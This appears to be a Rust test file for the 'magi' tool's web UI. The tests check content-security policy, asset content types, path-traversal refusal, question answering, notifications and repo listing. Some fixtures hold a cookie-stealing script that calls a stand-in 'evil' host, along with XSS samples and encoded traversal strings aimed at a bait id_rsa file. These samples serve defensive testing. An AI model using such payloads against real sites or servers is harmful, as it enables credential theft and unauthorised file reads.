4735 async fn start() -> Self {
4736 Self::with_loop(launch_idle).await
4737 }
4738
4739 async fn with_loop(launch: Launch) -> Self {
4741 let home = TempDir::new().expect("temp home");
4742 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4743 Self { home, addr }
4744 }
4745
4746 async fn with_repo(repo: PathBuf) -> Self {
4750 let home = TempDir::new().expect("temp home");
4751 let addr = Self::serve(home.path(), repo, launch_idle).await;
4752 Self { home, addr }
4753 }
4754
4755 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4756 let queue = Queue::at(home.join("queue"));
4757 let runs = home.join("runs");
4758 std::fs::create_dir_all(&runs).expect("runs dir");
4759 let worktrees = home.join("wt").join("magi");
4760 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4761 let ui = Ui::new(
4762 queue,
4763 Questions::at(home.join("questions")),
4764 Talks::at(home.join("talks")),
4765 runs,
4766 home.to_path_buf(),
4767 repo,
4768 )
4769 .with_worktrees_root(worktrees)
4770 .with_launch(launch);
4771 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4772 .await
4773 .expect("bind loopback");
4774 let addr = listener.local_addr().expect("local addr");
4775 tokio::spawn(async move {
4776 let _ = axum::serve(listener, ui.router()).await;
4777 });
4778 addr
4779 }
4780
4781 fn queue(&self) -> Queue {
4782 Queue::at(self.home.path().join("queue"))
4783 }
4784
4785 fn questions(&self) -> Questions {
4786 Questions::at(self.home.path().join("questions"))
4787 }
4788
4789 fn talks(&self) -> Talks {
4790 Talks::at(self.home.path().join("talks"))
4791 }
4792
4793 fn runs(&self) -> PathBuf {
4794 self.home.path().join("runs")
4795 }
4796
4797 async fn get(&self, path: &str) -> Res {
4798 request(self.addr, "GET", path, None).await
4799 }
4800
4801 async fn head(&self, path: &str) -> Res {
4806 request(self.addr, "HEAD", path, None).await
4807 }
4808
4809 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4810 request(self.addr, "POST", path, body).await
4811 }
4812
4813 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4814 request_with(self.addr, "GET", path, None, extra).await
4815 }
4816
4817 async fn delete(&self, path: &str) -> Res {
4818 request(self.addr, "DELETE", path, None).await
4819 }
4820
4821 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4823 request_bytes(self.addr, path, headers, body).await
4824 }
4825 }
4826
4827 struct Res {
4828 status: u16,
4829 headers: String,
4830 head: String,
4835 body: String,
4836 bytes: Vec<u8>,
4840 }
4841
4842 impl Res {
4843 fn json(&self) -> Value {
4844 serde_json::from_str(&self.body)
4845 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4846 }
4847
4848 fn header(&self, name: &str) -> Option<&str> {
4850 self.head.lines().find_map(|line| {
4851 let (key, value) = line.split_once(':')?;
4852 key.trim()
4853 .eq_ignore_ascii_case(name)
4854 .then(|| value.trim_start().trim_end_matches('\r'))
4855 })
4856 }
4857 }
4858
4859 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4862 request_with(addr, method, path, body, &[]).await
4863 }
4864
4865 async fn request_with(
4869 addr: SocketAddr,
4870 method: &str,
4871 path: &str,
4872 body: Option<&str>,
4873 extra: &[(&str, &str)],
4874 ) -> Res {
4875 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4876 for (name, value) in extra {
4877 head.push_str(&format!("{name}: {value}\r\n"));
4878 }
4879 if let Some(body) = body {
4880 head.push_str("Content-Type: application/json\r\n");
4881 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4882 }
4883 head.push_str("\r\n");
4884 if let Some(body) = body {
4885 head.push_str(body);
4886 }
4887 let mut socket = tokio::net::TcpStream::connect(addr)
4888 .await
4889 .expect("connect to the test server");
4890 socket
4891 .write_all(head.as_bytes())
4892 .await
4893 .expect("write request");
4894 let mut raw = Vec::new();
4895 socket.read_to_end(&mut raw).await.expect("read response");
4896 let split = raw
4899 .windows(4)
4900 .position(|w| w == b"\r\n\r\n")
4901 .expect("a header block");
4902 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4903 let bytes = raw[split + 4..].to_vec();
4904 let status = head
4905 .lines()
4906 .next()
4907 .and_then(|line| line.split_whitespace().nth(1))
4908 .and_then(|code| code.parse().ok())
4909 .expect("a status line");
4910 Res {
4911 status,
4912 headers: head.to_lowercase(),
4913 head,
4914 body: String::from_utf8_lossy(&bytes).into_owned(),
4915 bytes,
4916 }
4917 }
4918
4919 async fn request_bytes(
4925 addr: SocketAddr,
4926 path: &str,
4927 headers: &[(&str, &str)],
4928 body: &[u8],
4929 ) -> Res {
4930 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4931 for (name, value) in headers {
4932 head.push_str(&format!("{name}: {value}\r\n"));
4933 }
4934 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4935 let mut socket = tokio::net::TcpStream::connect(addr)
4936 .await
4937 .expect("connect to the test server");
4938 socket
4939 .write_all(head.as_bytes())
4940 .await
4941 .expect("write request head");
4942 socket.write_all(body).await.expect("write request body");
4943 let mut raw = Vec::new();
4944 socket.read_to_end(&mut raw).await.expect("read response");
4945 let split = raw
4946 .windows(4)
4947 .position(|w| w == b"\r\n\r\n")
4948 .expect("a header block");
4949 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4950 let bytes = raw[split + 4..].to_vec();
4951 let status = head
4952 .lines()
4953 .next()
4954 .and_then(|line| line.split_whitespace().nth(1))
4955 .and_then(|code| code.parse().ok())
4956 .expect("a status line");
4957 Res {
4958 status,
4959 headers: head.to_lowercase(),
4960 head,
4961 body: String::from_utf8_lossy(&bytes).into_owned(),
4962 bytes,
4963 }
4964 }
4965
4966 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4968 let mut state = RunState::new(
4969 PathBuf::from("/repo/magi"),
4970 "main".to_owned(),
4971 "0123456789abcdef".to_owned(),
4972 "Add a web UI\n\nMobile first.".to_owned(),
4973 Config::default(),
4974 );
4975 state.id = id.to_owned();
4976 state.status = status;
4977 let dir = runs.join(id);
4978 std::fs::create_dir_all(&dir).expect("run dir");
4979 std::fs::write(
4980 dir.join("run.json"),
4981 serde_json::to_string_pretty(&state).expect("serialize run"),
4982 )
4983 .expect("write run.json");
4984 }
4985
4986 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4987 let body = serde_json::json!({
4988 "schema": 1,
4989 "pid": 4242,
4990 "started_at": Timestamp::now().to_string(),
4991 "updated_at": updated_at.to_string(),
4992 "idle": false,
4993 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4994 "completed": 7,
4995 "polls": 143,
4996 });
4997 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4998 }
4999
5000 fn launch_idle(
5010 _opts: daemon::Opts,
5011 stop: daemon::Stop,
5012 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
5013 Box::pin(async move {
5014 while !stop.stopped() {
5015 tokio::time::sleep(Duration::from_millis(2)).await;
5016 }
5017 Ok(())
5018 })
5019 }
5020
5021 fn launch_broken(
5024 _opts: daemon::Opts,
5025 _stop: daemon::Stop,
5026 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
5027 Box::pin(async {
5028 Err(anyhow::anyhow!(
5029 "publish the daemon status file: read-only file system"
5030 ))
5031 })
5032 }
5033
5034 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
5041 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
5042
5043 fn launch_knocking_on_the_way_out(
5050 _opts: daemon::Opts,
5051 stop: daemon::Stop,
5052 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
5053 Box::pin(async move {
5054 while !stop.stopped() {
5055 tokio::time::sleep(Duration::from_millis(2)).await;
5056 }
5057 let addr = PARK_KNOCK
5058 .lock()
5059 .expect("park knock")
5060 .expect("the test set an address");
5061 let heard = request(addr, "GET", "/api/health", None).await.status;
5062 *PARK_HEARD.lock().expect("park heard") = Some(heard);
5063 Ok(())
5064 })
5065 }
5066
5067 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
5076 for _ in 0..SETTLE_STEPS {
5077 let view = fx.get("/api/loop").await.json();
5078 if want(&view) {
5079 return view;
5080 }
5081 tokio::time::sleep(Duration::from_millis(10)).await;
5082 }
5083 panic!(
5084 "the loop never settled: {}",
5085 fx.get("/api/loop").await.json()
5086 );
5087 }
5088
5089 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
5091 let store = fx.questions();
5092 let mut q = Question::new(
5093 "20260902-000000-beef".to_owned(),
5094 "implement".to_owned(),
5095 "impl-A".to_owned(),
5096 summary.to_owned(),
5097 "because it matters".to_owned(),
5098 choices.iter().map(|c| (*c).to_owned()).collect(),
5099 );
5100 store.put(&mut q).expect("put question");
5101 q.id
5102 }
5103
5104 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
5110 let store = fx.questions();
5111 let mut q = Question::new(
5112 "20260902-000000-beef".to_owned(),
5113 "land".to_owned(),
5114 "fix".to_owned(),
5115 "Merge this?".to_owned(),
5116 "the diff is in the panel".to_owned(),
5117 vec!["merge".to_owned(), "hold".to_owned()],
5118 );
5119 let staging = fx.home.path().join("staging");
5122 std::fs::create_dir_all(&staging).expect("staging dir");
5123 let sources: Vec<PathBuf> = assets
5124 .iter()
5125 .map(|(name, bytes)| {
5126 let path = staging.join(name);
5127 std::fs::write(&path, bytes).expect("write staged asset");
5128 path
5129 })
5130 .collect();
5131 store
5132 .put_panel(&mut q, html, &sources)
5133 .expect("write the panel");
5134 store.put(&mut q).expect("put question");
5135 q.id
5136 }
5137
5138 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
5147 let store = fx.talks();
5148 std::fs::create_dir_all(store.root()).expect("talks dir");
5149 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
5150 .expect("serialize a seat");
5151 let body = serde_json::json!({
5152 "schema": 1,
5153 "id": id,
5154 "repo": "/repo/magi",
5155 "agent": "mock",
5156 "status": status,
5157 "turns": [],
5158 "created_at": Timestamp::now().to_string(),
5159 "updated_at": Timestamp::now().to_string(),
5160 "seat": seat,
5161 });
5162 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
5163 store.get(id).expect("the seeded talk has to be readable");
5164 id.to_owned()
5165 }
5166
5167 #[tokio::test]
5168 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
5169 let fx = Fixture::start().await;
5170 let id = panel(
5171 &fx,
5172 "<h1>Merge?</h1><img src=\"diff.svg\">",
5173 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
5174 );
5175
5176 for path in [
5177 format!("/api/questions/{id}/panel"),
5178 format!("/api/questions/{id}/asset/diff.svg"),
5179 ] {
5180 let res = fx.get(&path).await;
5181 assert_eq!(res.status, 200, "{path}: {}", res.body);
5182 assert_eq!(
5188 res.header("content-security-policy"),
5189 Some(
5190 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
5191 font-src data:; base-uri 'none'; form-action 'none'; \
5192 frame-ancestors 'self'"
5193 ),
5194 "{path} is the only thing between a hostile panel and the tailnet"
5195 );
5196 assert_eq!(
5197 res.header("x-content-type-options"),
5198 Some("nosniff"),
5199 "{path}: a browser must not re-decide the type we sent"
5200 );
5201 assert_eq!(
5202 res.header("referrer-policy"),
5203 Some("no-referrer"),
5204 "{path}: a panel must not leak the question id off the machine"
5205 );
5206
5207 let pre = fx.head(&path).await;
5212 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
5213 assert_eq!(
5214 pre.header("content-security-policy"),
5215 res.header("content-security-policy"),
5216 "{path}: the preflight carries the same policy"
5217 );
5218 assert_eq!(
5219 pre.header("content-type"),
5220 res.header("content-type"),
5221 "{path}: the preflight carries the same type"
5222 );
5223 }
5224 }
5225
5226 #[tokio::test]
5227 async fn a_panel_reaches_the_browser_byte_for_byte() {
5228 let fx = Fixture::start().await;
5229 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
5234 let id = panel(&fx, html, &[]);
5235
5236 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
5237
5238 assert_eq!(res.status, 200);
5239 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
5240 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
5241 assert_eq!(
5242 res.header("content-disposition"),
5243 None,
5244 "the panel itself is rendered in the frame, not downloaded"
5245 );
5246 }
5247
5248 #[tokio::test]
5249 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
5250 let fx = Fixture::start().await;
5251 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
5252 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
5253 let id = panel(
5254 &fx,
5255 "<img src=\"diff.svg\"><img src=\"shot.png\">",
5256 &[("diff.svg", svg), ("shot.png", png)],
5257 );
5258
5259 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
5260 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
5261
5262 assert_eq!(as_svg.status, 200);
5263 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
5264 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
5269
5270 assert_eq!(as_png.status, 200);
5271 assert_eq!(as_png.header("content-type"), Some("image/png"));
5272 assert_eq!(
5273 as_png.header("content-disposition"),
5274 None,
5275 "a raster image has no execution surface, so tapping it still shows it"
5276 );
5277 assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
5278 }
5279
5280 #[tokio::test]
5281 async fn an_html_asset_is_never_served_as_html() {
5282 let fx = Fixture::start().await;
5283 let id = panel(
5284 &fx,
5285 "<p>see the notes</p>",
5286 &[
5287 (
5288 "notes.html",
5289 b"<script>fetch('http://evil/'+document.cookie)</script>",
5290 ),
5291 ("hook.js", b"fetch('http://evil/')"),
5292 ("data.json", b"{}"),
5293 ("HEADLINE.TXT", b"plain"),
5294 ],
5295 );
5296
5297 for name in ["notes.html", "hook.js", "data.json"] {
5298 let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
5299 assert_eq!(res.status, 200, "{name}: {}", res.body);
5300 assert_eq!(
5305 res.header("content-type"),
5306 Some("application/octet-stream"),
5307 "{name} must not be a type the browser will execute or render"
5308 );
5309 }
5310 let txt = fx
5313 .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
5314 .await;
5315 assert_eq!(
5316 txt.header("content-type"),
5317 Some("text/plain; charset=utf-8")
5318 );
5319 }
5320
5321 #[tokio::test]
5322 async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
5323 let fx = Fixture::start().await;
5324 let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5325 std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
5329
5330 for encoded in [
5337 "%2e%2e%2fid_rsa",
5338 "..%2fid_rsa",
5339 "..%5cid_rsa",
5340 "%2e%2e%5cid_rsa",
5341 "diff%00.svg",
5342 "..",
5343 ".hidden",
5344 "%2e%2e%2f%2e%2e%2fid_rsa",
5345 ] {
5346 let res = fx
5347 .get(&format!("/api/questions/{id}/asset/{encoded}"))
5348 .await;
5349 assert_eq!(
5350 res.status, 400,
5351 "`{encoded}` has to be refused by name, not looked up: {}",
5352 res.body
5353 );
5354 assert!(res.json()["error"].is_string(), "{}", res.body);
5355 }
5356
5357 for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
5363 let res = fx
5364 .get(&format!("/api/questions/{id}/asset/{literal}"))
5365 .await;
5366 assert_eq!(
5367 res.status, 404,
5368 "`{literal}` must not match the asset route at all: {}",
5369 res.body
5370 );
5371 }
5372 }
5373
5374 #[tokio::test]
5375 async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
5376 let fx = Fixture::start().await;
5377 let plain = ask(&fx, "Which backend?", &["SQLite"]);
5378 let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5379
5380 let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
5384 assert_eq!(none.status, 404, "{}", none.body);
5385 assert!(none.json()["error"].is_string(), "{}", none.body);
5386 assert_eq!(
5387 fx.head(&format!("/api/questions/{plain}/panel"))
5388 .await
5389 .status,
5390 404,
5391 "the preflight is the only way the client can learn this"
5392 );
5393
5394 let missing = fx
5396 .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
5397 .await;
5398 assert_eq!(missing.status, 404, "{}", missing.body);
5399 assert!(missing.json()["error"].is_string(), "{}", missing.body);
5400
5401 assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
5403 assert_eq!(
5404 fx.get("/api/questions/nope/asset/diff.svg").await.status,
5405 404
5406 );
5407 }
5408
5409 #[tokio::test]
5410 async fn a_run_with_an_open_question_reads_as_waiting() {
5411 let fx = Fixture::start().await;
5412 let run = "20260902-000000-beef".to_owned();
5413 write_run(&fx.runs(), &run, RunStatus::Implementing);
5414
5415 let before = fx.get("/api/runs").await.json();
5416 assert_eq!(before[0]["waiting"], false, "{before}");
5417
5418 let store = fx.questions();
5419 let mut q = Question::new(
5420 run.clone(),
5421 "implement".to_owned(),
5422 "impl-A".to_owned(),
5423 "Which backend?".to_owned(),
5424 String::new(),
5425 vec!["SQLite".to_owned()],
5426 );
5427 store.put(&mut q).expect("put");
5428
5429 let during = fx.get("/api/runs").await.json();
5430 assert_eq!(during[0]["waiting"], true, "{during}");
5431
5432 q.answer(Answer::Choice("SQLite".to_owned()))
5435 .expect("answer");
5436 store.put(&mut q).expect("put");
5437 let after = fx.get("/api/runs").await.json();
5438 assert_eq!(after[0]["waiting"], false, "{after}");
5439 }
5440
5441 #[tokio::test]
5442 async fn an_open_question_is_listed_and_counted_by_health() {
5443 let fx = Fixture::start().await;
5444 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5445
5446 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5447 let listed = fx.get("/api/questions").await.json();
5448 assert_eq!(listed.as_array().expect("array").len(), 1);
5449 assert_eq!(listed[0]["id"], id);
5450 assert_eq!(listed[0]["status"], "open");
5451 assert_eq!(listed[0]["choices"][1], "Redis");
5452 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5455 }
5456
5457 #[tokio::test]
5458 async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5459 let fx = Fixture::start().await;
5460 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5461 let path = format!("/api/questions/{id}/answer");
5462
5463 let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5464 assert_eq!(res.status, 200, "{}", res.body);
5465 let body = res.json();
5466 assert_eq!(body["status"], "answered");
5467 assert_eq!(body["answer"]["choice"], "Redis");
5468
5469 let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5473 assert_eq!(again.status, 409, "{}", again.body);
5474 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5475 }
5476
5477 #[tokio::test]
5478 async fn saying_something_appends_a_turn_without_answering() {
5479 let fx = Fixture::start().await;
5480 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5481 let path = format!("/api/questions/{id}/say");
5482
5483 let res = fx
5484 .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5485 .await;
5486 assert_eq!(res.status, 200, "{}", res.body);
5487 let body = res.json();
5488 assert_eq!(body["status"], "open", "talking back is not a decision");
5489 assert_eq!(body["answer"], Value::Null);
5490 assert_eq!(body["thread"][0]["who"], "operator");
5491 assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5492 assert_eq!(body["waiting_on_agent"], true);
5493 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5495 }
5496
5497 #[tokio::test]
5498 async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5499 let fx = Fixture::start().await;
5500 let store = fx.questions();
5501 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5502 assert_eq!(
5503 fx.get("/api/health").await.json()["questions_needs_owner"],
5504 1
5505 );
5506
5507 let res = fx
5513 .post(
5514 &format!("/api/questions/{id}/say"),
5515 Some(r#"{"body":"why not Postgres?"}"#),
5516 )
5517 .await;
5518 assert_eq!(res.status, 200, "{}", res.body);
5519 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5520 assert_eq!(
5521 fx.get("/api/health").await.json()["questions_needs_owner"],
5522 0,
5523 "waiting on the agent is not waiting on the owner"
5524 );
5525
5526 let mut q = store.get(&id).expect("get");
5530 q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5531 .expect("reply");
5532 store.put(&mut q).expect("put");
5533 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5534 assert_eq!(
5535 fx.get("/api/health").await.json()["questions_needs_owner"],
5536 1,
5537 "the agent's reply is what should light the banner back up"
5538 );
5539 }
5540
5541 #[tokio::test]
5542 async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5543 let fx = Fixture::start().await;
5544 let store = fx.questions();
5545
5546 let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5547 let res = fx
5548 .post(
5549 &format!("/api/questions/{empty_id}/say"),
5550 Some(r#"{"body":" "}"#),
5551 )
5552 .await;
5553 assert_eq!(res.status, 400, "{}", res.body);
5554
5555 let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5556 let mut answered = store.get(&answered_id).expect("get");
5557 answered
5558 .answer(Answer::Choice("SQLite".to_owned()))
5559 .expect("answer");
5560 store.put(&mut answered).expect("put");
5561 let res = fx
5562 .post(
5563 &format!("/api/questions/{answered_id}/say"),
5564 Some(r#"{"body":"still there?"}"#),
5565 )
5566 .await;
5567 assert_eq!(res.status, 409, "{}", res.body);
5568
5569 let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5570 let mut abandoned = store.get(&abandoned_id).expect("get");
5571 abandoned.abandon("timed out");
5572 store.put(&mut abandoned).expect("put");
5573 let res = fx
5574 .post(
5575 &format!("/api/questions/{abandoned_id}/say"),
5576 Some(r#"{"body":"still there?"}"#),
5577 )
5578 .await;
5579 assert_eq!(res.status, 409, "{}", res.body);
5580 }
5581
5582 #[tokio::test]
5583 async fn an_answer_the_question_does_not_offer_is_refused() {
5584 let fx = Fixture::start().await;
5585 let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5586 let path = format!("/api/questions/{id}/answer");
5587
5588 for body in [
5589 r#"{"choice":"Postgres"}"#,
5590 r#"{"text":"whatever you think"}"#,
5591 r#"{"choice":"Redis","text":"both"}"#,
5592 r#"{}"#,
5593 ] {
5594 let res = fx.post(&path, Some(body)).await;
5595 assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5596 assert!(res.json()["error"].is_string(), "{}", res.body);
5597 }
5598 assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5600 }
5601
5602 #[tokio::test]
5603 async fn a_free_text_question_takes_text_and_not_a_choice() {
5604 let fx = Fixture::start().await;
5605 let id = ask(&fx, "What should the flag be called?", &[]);
5606 let path = format!("/api/questions/{id}/answer");
5607
5608 assert_eq!(
5609 fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5610 400
5611 );
5612 let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5613 assert_eq!(res.status, 200, "{}", res.body);
5614 assert_eq!(res.json()["answer"]["text"], "--json");
5615 }
5616
5617 #[tokio::test]
5618 async fn an_unknown_question_is_a_json_404() {
5619 let fx = Fixture::start().await;
5620 let res = fx
5621 .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5622 .await;
5623 assert_eq!(res.status, 404, "{}", res.body);
5624 assert!(res.json()["error"].is_string());
5625 }
5626
5627 #[tokio::test]
5628 async fn notifications_list_read_dismiss_and_health_agree() {
5629 let fx = Fixture::start().await;
5630 let store = Notices::at(fx.home.path().join("notifications"));
5631 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 0);
5632 let rev0 = fx.get("/api/health").await.json()["notifications_rev"].clone();
5633
5634 let a = store.raise(Notice::warn("task:1", "held")).unwrap();
5635 let b = store.raise(Notice::error("run:2", "blocked")).unwrap();
5636
5637 let health = fx.get("/api/health").await.json();
5638 assert_eq!(health["notifications_unread"], 2);
5639 assert_ne!(
5640 health["notifications_rev"], rev0,
5641 "the badge must move live"
5642 );
5643
5644 let listed = fx.get("/api/notifications").await.json();
5645 assert_eq!(listed["unread"], 2);
5646 assert_eq!(listed["items"].as_array().unwrap().len(), 2);
5647 assert_eq!(listed["items"][0]["severity"], "error", "newest first");
5648
5649 let read = fx
5650 .post(&format!("/api/notifications/{}/read", a.id), None)
5651 .await;
5652 assert_eq!(read.status, 200, "{}", read.body);
5653 assert_eq!(fx.get("/api/notifications").await.json()["unread"], 1);
5654
5655 let gone = fx
5656 .post(&format!("/api/notifications/{}/dismiss", b.id), None)
5657 .await;
5658 assert_eq!(gone.status, 200, "{}", gone.body);
5659 let listed = fx.get("/api/notifications").await.json();
5660 assert_eq!(listed["items"].as_array().unwrap().len(), 1);
5661 assert_eq!(listed["unread"], 0);
5662
5663 store.raise(Notice::info("x", "again")).unwrap();
5664 let all = fx.post("/api/notifications/read-all", None).await;
5665 assert_eq!(all.status, 200, "{}", all.body);
5666 assert_eq!(all.json()["marked"], 1);
5667 assert_eq!(
5668 fx.get("/api/health").await.json()["notifications_unread"],
5669 0
5670 );
5671
5672 let missing = fx.post("/api/notifications/nope/read", None).await;
5673 assert_eq!(missing.status, 404, "{}", missing.body);
5674 assert!(missing.json()["error"].is_string());
5675 }
5676
5677 #[tokio::test]
5684 async fn a_task_cannot_be_filed_over_the_phone_directly() {
5685 let f = Fixture::start().await;
5686
5687 let res = f
5688 .post(
5689 "/api/queue",
5690 Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5691 )
5692 .await;
5693
5694 assert_eq!(
5695 res.status, 405,
5696 "POST /api/queue must not be a route: {}",
5697 res.body
5698 );
5699 assert!(
5700 f.queue().list().is_empty(),
5701 "a task filed by a route that does not exist must not reach the disk"
5702 );
5703 assert_eq!(f.get("/api/queue").await.status, 200);
5706 }
5707
5708 fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5710 std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5711 .expect("checkout dir");
5712 }
5713
5714 #[tokio::test]
5715 async fn repos_list_returns_name_and_path_for_every_configured_root() {
5716 let tmp = TempDir::new().expect("tempdir");
5717 let repo = tmp.path().join("repo");
5718 std::fs::create_dir_all(&repo).expect("repo dir");
5719 let root = tmp.path().join("root");
5720 make_checkout(&root, "github.com", "yukimemi", "magi");
5721 std::fs::write(
5722 repo.join("magi.toml"),
5723 format!(
5724 "[repos]\nroots = [{:?}]\n",
5725 root.to_string_lossy().into_owned()
5726 ),
5727 )
5728 .expect("write magi.toml");
5729
5730 let f = Fixture::with_repo(repo).await;
5731 let res = f.get("/api/repos").await;
5732 assert_eq!(res.status, 200, "{}", res.body);
5733 let list = res.json();
5734 let repos = list.as_array().expect("an array");
5735 assert_eq!(repos.len(), 1);
5736 assert_eq!(repos[0]["name"], "yukimemi/magi");
5737 assert!(
5738 repos[0]["path"]
5739 .as_str()
5740 .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5741 "{list}"
5742 );
5743 }
5744
5745 #[tokio::test]
5746 async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5747 let tmp = TempDir::new().expect("tempdir");
5748 let repo = tmp.path().join("repo");
5749 std::fs::create_dir_all(&repo).expect("repo dir");
5750 let root = tmp.path().join("root");
5751 make_checkout(&root, "github.com", "yukimemi", "magi");
5752 std::fs::write(
5753 repo.join("magi.toml"),
5754 format!(
5755 "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5756 root.to_string_lossy().into_owned()
5757 ),
5758 )
5759 .expect("write magi.toml");
5760
5761 let f = Fixture::with_repo(repo).await;
5762 let first = f.get("/api/repos").await;
5763 assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5764
5765 make_checkout(&root, "github.com", "yukimemi", "rvpm");
5768 let second = f.get("/api/repos").await;
5769 assert_eq!(
5770 second.json().as_array().map(Vec::len),
5771 Some(1),
5772 "a fresh cache must not rescan inside the TTL"
5773 );
5774
5775 let refreshed = f.get("/api/repos?refresh=1").await;
5776 assert_eq!(
5777 refreshed.json().as_array().map(Vec::len),
5778 Some(2),
5779 "an explicit refresh must rescan even inside the TTL"
5780 );
5781 }
5782
5783 const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5789
5790 async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5794 let tmp = TempDir::new().expect("tempdir");
5795 let repo = tmp.path().join("repo");
5796 std::fs::create_dir_all(&repo).expect("repo dir");
5797 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5798 let f = Fixture::with_repo(repo.clone()).await;
5799 (tmp, repo, f)
5800 }
5801
5802 #[tokio::test]
5803 async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5804 let (_tmp, _repo, f) = talk_fixture().await;
5805
5806 let opened = f.post("/api/talks", None).await;
5809 assert_eq!(opened.status, 201, "{}", opened.body);
5810 let body = opened.json();
5811 assert_eq!(body["status"], "open");
